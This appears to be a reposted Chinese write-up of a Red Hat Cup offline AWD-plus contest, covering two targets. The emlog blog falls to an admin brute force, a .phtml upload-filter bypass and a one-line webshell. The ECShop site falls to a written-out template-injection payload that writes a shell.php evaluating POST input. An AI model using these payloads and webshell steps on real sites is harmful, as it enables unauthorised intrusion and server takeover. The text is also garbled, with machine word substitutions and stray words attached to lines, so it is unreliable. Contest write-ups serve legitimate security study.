红帽杯线下AWD plus writeup

粤湾期货php


访问是一个由emlog的博客站点。html

 


直接访问后台得知存在admin用户对admin进行暴力破解
web

 



上传附件处限制了文件类型,发现可添加容许添加后缀名。尝试了phpphp5等相似添加后,都会被更改成x类型,最后尝试添加phtml,成功添加。shell

 



而后直接去写文章处添加附件,并上传后缀为pthml的一句话安全

 


成功上传后,右键附件复制连接地址,上菜刀,成功getshell。并在根目录下找到flag
微信

 

 

粤湾租赁app


访问web题目,系统为ecshopcms,发现两个登陆处,一个是前台登录,一个是后台登录,前台登录并未发现什么能够拿下的点。加密

 


已知存在admin用户,进行爆破spa

 


ecshop有已知的getshell方法,.net

直接在模板管理语言项编辑直接修改来写入shell文件搜索关键字:用户信息;用户信息四个字必定不要删除,在以后添加:(base64加密去掉了最后的=)

1.${${fputs(fopen(base64_decode(c2hlbGwucGhw),w), base64_decode(PD9waHAgZXZhbCgkX1BPU1RbJ2gnXSk7Pz3))}}

 


然后保存,保存后访问user.php便可在根目录下生成shell.phpshell。而后上菜刀,成功在根目录得到flag

 


 

 

手握日月摘星辰,安全路上永不止步。

                                                      - Khan攻防安全实验室


本文分享自微信公众号 - Khan安全团队(KhanCJSH)。
若有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一块儿分享。

相关文章
相关标签/搜索